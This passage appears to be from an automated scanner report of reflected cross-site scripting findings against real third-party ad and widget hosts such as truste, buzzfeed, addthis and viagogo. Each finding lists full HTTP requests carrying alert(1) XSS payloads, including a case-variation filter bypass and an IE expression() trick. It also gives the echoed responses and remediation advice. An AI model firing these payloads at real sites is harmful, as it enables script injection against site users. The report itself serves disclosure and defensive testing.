Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:06 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3803

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});

3.44. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the JavaScript response (Content-Type: text/javascript) unquoted, in the position of the numeric property value 'ox':20... of the te_clr1_att02cont3_bi object. The payload a5e47<script>alert(1)</script>27256ed0b74 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This is a bare-code context: there is no quote to break out of, so anything supplied in ox is handed to the JavaScript parser as is. The submitted <script> tag is a syntax error at that position, but a value that is a valid JavaScript expression would be evaluated, which makes this the most directly exploitable of the /ca reflection points in this report. Note also that the lowercase <script> was echoed here, whereas the cid, iplc, js, plc and zi parameters needed the case-variation bypass; the filter evidently does not cover this parameter.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20a5e47<script>alert(1)</script>27256ed0b74&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 4617

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
</div>\n';    var te_clr1_att02cont3_bi = {    'baseName':'te-clr1-att02cont3',                            'anchName':'te-clr1-att02cont3-anch',                            'width':728,                            'height':90,                            'ox':20a5e47<script>alert(1)</script>27256ed0b74,                            'oy':0,                            'plc':'tr',                            'iplc':'ctr',                            'intDivName':'te-clr1-att02cont3-itl',                            'iconSpanId':'te-clr1-att02cont3-icon',                            'backgroundColor':'white',                            'opacity':
...[SNIP]...

3.45. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the JavaScript response (Content-Type: text/javascript), inside the double-quoted string literal plc:"..." of the te_clr1_att02cont3_bi binding object. The payload a3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into, here a JavaScript string literal.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:23 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tra3412<ScRiPt>alert(1)</ScRiPt>a3c6dbfee4b",iplc:"ctr",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/c
...[SNIP]...

3.46. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the JavaScript response (Content-Type: text/javascript), inside the double-quoted string literal zindex:"..." of the te_clr1_att02cont3_bi binding object. The payload c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f was submitted in the zi parameter. This input was echoed unmodified in the application's response.

Because the reflection lands inside a string literal, the demonstrated payload is inert data; it reaches the JavaScript parser only if the literal is first terminated, which this test did not exercise. The finding is the missing output encoding for that context, together with the filter bypass below.

The application blocks the lowercase sequence <script> but compares it case-sensitively: submitting <ScRiPt> instead of <script> passes the filter and is echoed unchanged.

Remediation detail

Blacklist filters that look for known-bad strings are usually inadequate (this one falls to a case change) and should be replaced by allow-list input validation plus output encoding that matches the context the value is written into, here a JavaScript string literal. A z-index is an integer and can simply be validated as one.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:18 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
uste.ca.hideoverlay(te_clr1_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002c0abf<ScRiPt>alert(1)</ScRiPt>9538de4130f",cam:"2",cid:"0311wl728x90"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("
...[SNIP]...

3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbbee'%3balert(1)//a187687dcce was submitted in the id parameter. This input was echoed as fbbee';alert(1)//a187687dcce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/context.cgi?id=91041742fbbee'%3balert(1)//a187687dcce&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:36 GMT
Server: Barista/1.1-(eankbk)
Connection: Close
Content-Length: 3465
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
<a target="_Blank" href="https://ads.pulse360.com/advertisers.html?refid=91041742fbbee';alert(1)//a187687dcce" style="color: inherit; text-decoration: inherit;" >
...[SNIP]...

3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the amp;or request parameter is copied into the HTML document as plain text between tags. The payload 1726d<script>alert(1)</script>283b85948bd was submitted in the amp;or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.au&amp;to=1&amp;or=vb1726d<script>alert(1)</script>283b85948bd&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:14 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>alert(1)</script>283b85948bd&wid=1&to=1&u=www.thevine.com.au - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb1726d<script>
...[SNIP]...

3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload bb541<script>alert(1)</script>ed88bb99e34 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34&amp;to=1&amp;or=vb&amp;wid=1&amp;cb=1304949685154 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 09 May 2011 14:07:12 GMT
Server: lighttpd bf1
Content-Length: 597

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 143,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>alert(1)</script>ed88bb99e34 - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=www.thevine.com.aubb541<script>
...[SNIP]...

3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 84ed8<script>alert(1)</script>75de7d1f973 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 399
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:33 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949873.1FE|1304949873.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:33 GMT
Connection: close

_ate.ad.hpr84ed8<script>alert(1)</script>75de7d1f973({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishti
...[SNIP]...

3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /feeds/widget.ashx

Issue detail

The value of the PCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d was submitted in the PCID parameter. This input was echoed as e596e"style="x:expression(alert(1))"a69dbd9369d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /feeds/widget.ashx?category=rockandpoptickets&formatid=2&count=10&affiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style%3d"x%3aexpression(alert(1))"a69dbd9369d HTTP/1.1
Host: edge.viagogo.co.uk
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=7200
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:04:32 GMT
Expires: Mon, 09 May 2011 16:04:32 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: vTrack=769; domain=viagogo.co.uk; expires=Wed, 08-Jun-2011 14:04:32 GMT; path=/; HttpOnly
Set-Cookie: .VGGANON=8nITaAQwzgEkAAAAN2NkY2E2ZGUtMDAyYS00OGJlLWI1N2QtYzZjNWZjOTU2NTg30; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:44:32 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 4250

<style type="text/css">
/* CSS STARTS HERE */
.go_simple_widget {border:1px solid #bfbfc0; margin:0px; padding:0px;}
.go_simple_widget h1 {margin:0px; padding: 4px 0px 4px 8px; border-bottom:1px
...[SNIP]...
<a href="http://www.viagogo.co.uk/Concert-Tickets/Rock-and-Pop/Take-That-Tickets?AffiliateID=769&PCID=HAFFGBCLAREFWidg371EC42B62e596e"style="x:expression(alert(1))"a69dbd9369d" title="Take That Tickets" target="_blank">
...[SNIP]...

3.52. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1b1e<script>alert(1)</script>b22bf009d9c was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C64981B8EF23259D938F84387571176; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 09 May 2011 13:59:26 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835d1b1e<script>alert(1)</script>b22bf009d9c");

3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48826'-alert(1)-'7bb1993fb0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=13767&48826'-alert(1)-'7bb1993fb0c=1 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q+LnAA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:56 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:56 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
